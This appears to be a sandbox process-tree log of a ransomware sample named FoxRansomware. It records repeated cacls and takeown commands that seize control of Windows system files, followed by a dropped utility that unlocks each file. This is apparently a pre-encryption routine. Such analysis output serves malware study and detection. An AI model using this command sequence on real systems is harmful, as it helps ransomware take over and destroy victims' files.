C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win64.xml""2⤵PID:5620
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win64.xml" /E /G Admin:F /C3⤵PID:5344
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win64.xml"3⤵PID:3908
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "MicrosoftOffice2013Office365Win64.xml" -nobanner3⤵PID:2176
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "MicrosoftOffice2013Office365Win64.xml" -nobanner4⤵PID:6072
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2104
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml""2⤵PID:5920
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml" /E /G Admin:F /C3⤵PID:5576
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml"3⤵PID:284
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "MicrosoftOutlook2016CAWin64.xml" -nobanner3⤵PID:3552
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "MicrosoftOutlook2016CAWin64.xml" -nobanner4⤵PID:4792
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1288
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd""2⤵PID:2188
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd" /E /G Admin:F /C3⤵PID:4920
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd"3⤵PID:5728
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner3⤵PID:5856
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner4⤵PID:5792
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4168
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml""2⤵PID:2948
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml" /E /G Admin:F /C3⤵PID:3952
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml"3⤵
- Modifies file permissions
PID:5392
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "MicrosoftLync2013Win32.xml" -nobanner3⤵PID:1416
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "MicrosoftLync2013Win32.xml" -nobanner4⤵PID:5404
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5616
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml""2⤵PID:5164
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml" /E /G Admin:F /C3⤵PID:3676
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml"3⤵PID:3752
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "MicrosoftOffice2013Win64.xml" -nobanner3⤵PID:3440
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "MicrosoftOffice2013Win64.xml" -nobanner4⤵PID:5384
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5552
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml""2⤵PID:5424
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml" /E /G Admin:F /C3⤵PID:3716
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml"3⤵PID:6004
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "MicrosoftSkypeForBusiness2016Win64.xml" -nobanner3⤵PID:5748
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "MicrosoftSkypeForBusiness2016Win64.xml" -nobanner4⤵PID:6052
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4488
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.93fa158a-00d2-4e8a-b1e6-9c659b0c56eb.1.etl""2⤵PID:5352
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.93fa158a-00d2-4e8a-b1e6-9c659b0c56eb.1.etl" /E /G Admin:F /C3⤵PID:5416
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.93fa158a-00d2-4e8a-b1e6-9c659b0c56eb.1.etl"3⤵PID:2584
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "UpdateSessionOrchestration.93fa158a-00d2-4e8a-b1e6-9c659b0c56eb.1.etl" -nobanner3⤵PID:2796
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "UpdateSessionOrchestration.93fa158a-00d2-4e8a-b1e6-9c659b0c56eb.1.etl" -nobanner4⤵PID:3968
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:736
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.5a8acab2-b4f3-4bc7-8b44-69d649719af5.1.etl""2⤵PID:5812
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\WuProvider.5a8acab2-b4f3-4bc7-8b44-69d649719af5.1.etl" /E /G Admin:F /C3⤵PID:3560
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.5a8acab2-b4f3-4bc7-8b44-69d649719af5.1.etl"3⤵PID:2684
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "WuProvider.5a8acab2-b4f3-4bc7-8b44-69d649719af5.1.etl" -nobanner3⤵PID:5960
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "WuProvider.5a8acab2-b4f3-4bc7-8b44-69d649719af5.1.etl" -nobanner4⤵PID:2672
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4892
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db-shm""2⤵PID:3200
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db-shm" /E /G Admin:F /C3⤵PID:5364
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db-shm"3⤵PID:5256
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "ActivitiesCache.db-shm" -nobanner3⤵PID:2248
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "ActivitiesCache.db-shm" -nobanner4⤵PID:1544
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6060
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.5f15a3ee-8d16-4798-919f-3d5187aa6421.1.etl""2⤵PID:2176
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\WuProvider.5f15a3ee-8d16-4798-919f-3d5187aa6421.1.etl" /E /G Admin:F /C3⤵PID:5872
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.5f15a3ee-8d16-4798-919f-3d5187aa6421.1.etl"3⤵
- Modifies file permissions
PID:5612
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "WuProvider.5f15a3ee-8d16-4798-919f-3d5187aa6421.1.etl" -nobanner3⤵PID:4436
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "WuProvider.5f15a3ee-8d16-4798-919f-3d5187aa6421.1.etl" -nobanner4⤵PID:280
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:284
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.b77ad222-1c60-48c4-ae91-739e789cccc2.1.etl""2⤵PID:5772
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.b77ad222-1c60-48c4-ae91-739e789cccc2.1.etl" /E /G Admin:F /C3⤵PID:4416
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.b77ad222-1c60-48c4-ae91-739e789cccc2.1.etl"3⤵
- Modifies file permissions
PID:3556
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "UpdateSessionOrchestration.b77ad222-1c60-48c4-ae91-739e789cccc2.1.etl" -nobanner3⤵PID:3720
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "UpdateSessionOrchestration.b77ad222-1c60-48c4-ae91-739e789cccc2.1.etl" -nobanner4⤵PID:5928
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5780
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""2⤵PID:5792
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C3⤵PID:2188
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"3⤵PID:288
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "superbar.png" -nobanner3⤵PID:1532
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "superbar.png" -nobanner4⤵PID:3952
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5436
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""2⤵PID:5404
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" /E /G Admin:F /C3⤵PID:5008
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml"3⤵PID:2960
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "resource.xml" -nobanner3⤵PID:2180
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "resource.xml" -nobanner4⤵PID:4184
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2840
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\uk-UA\resource.xml""2⤵PID:1048
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\uk-UA\resource.xml" /E /G Admin:F /C3⤵PID:5164
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\uk-UA\resource.xml"3⤵PID:3096
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "resource.xml" -nobanner3⤵PID:840
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "resource.xml" -nobanner4⤵PID:3716
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4588
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml""2⤵PID:6052
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml" /E /G Admin:F /C3⤵PID:6012
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml"3⤵PID:5932
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "DesktopSettings2013.xml" -nobanner3⤵PID:2620
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "DesktopSettings2013.xml" -nobanner4⤵PID:6124
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2584
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml""2⤵PID:5756
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml" /E /G Admin:F /C3⤵PID:5324
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml"3⤵PID:3492
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "MicrosoftOffice2013BackupWin32.xml" -nobanner3⤵PID:496
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "MicrosoftOffice2013BackupWin32.xml" -nobanner4⤵PID:4540
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5640
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml""2⤵PID:6000
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml" /E /G Admin:F /C3⤵PID:5276
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml"3⤵PID:4972
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "MicrosoftOutlook2013CAWin32.xml" -nobanner3⤵PID:1304
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "MicrosoftOutlook2013CAWin32.xml" -nobanner4⤵PID:4776
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1208
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\VdiState.xml""2⤵PID:3908
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\VdiState.xml" /E /G Admin:F /C3⤵PID:5596
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\VdiState.xml"3⤵PID:3200
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "VdiState.xml" -nobanner3⤵PID:5940
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "VdiState.xml" -nobanner4⤵PID:1804
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:276
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""2⤵PID:4772
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C3⤵PID:4404
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"3⤵PID:3924
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "background.png" -nobanner3⤵PID:292
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "background.png" -nobanner4⤵PID:5920
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5160
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml""2⤵PID:4920
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml" /E /G Admin:F /C3⤵PID:5648
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml"3⤵PID:5772
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "tasks.xml" -nobanner3⤵PID:4560
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "tasks.xml" -nobanner4⤵PID:5736
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2648
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.9b96fa87-519f-416e-bb80-fc88a56fe191.1.etl""2⤵PID:6108
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.9b96fa87-519f-416e-bb80-fc88a56fe191.1.etl" /E /G Admin:F /C3⤵PID:3700
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.9b96fa87-519f-416e-bb80-fc88a56fe191.1.etl"3⤵PID:1180
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "MoUsoCoreWorker.9b96fa87-519f-416e-bb80-fc88a56fe191.1.etl" -nobanner3⤵PID:5220
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "MoUsoCoreWorker.9b96fa87-519f-416e-bb80-fc88a56fe191.1.etl" -nobanner4⤵PID:4992
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1148
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\EaseOfAccessSettings2013.xml""2⤵PID:5320
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\EaseOfAccessSettings2013.xml" /E /G Admin:F /C3⤵PID:4520
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\EaseOfAccessSettings2013.xml"3⤵PID:5404
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "EaseOfAccessSettings2013.xml" -nobanner3⤵PID:1416
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "EaseOfAccessSettings2013.xml" -nobanner4⤵PID:5952
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3852
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin64.xml""2⤵PID:5180
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin64.xml" /E /G Admin:F /C3⤵PID:4588
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin64.xml"3⤵
- Modifies file permissions
PID:5488
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "MicrosoftOffice2013BackupWin64.xml" -nobanner3⤵PID:5552
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "MicrosoftOffice2013BackupWin64.xml" -nobanner4⤵PID:2872
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5992
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin64.xml""2⤵PID:5416
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin64.xml" /E /G Admin:F /C3⤵PID:2584
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin64.xml"3⤵PID:4708
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "MicrosoftOutlook2013CAWin64.xml" -nobanner3⤵PID:2088
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "MicrosoftOutlook2013CAWin64.xml" -nobanner4⤵PID:6136
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2028
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1""2⤵PID:3560
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1" /E /G Admin:F /C3⤵PID:5984
-
-
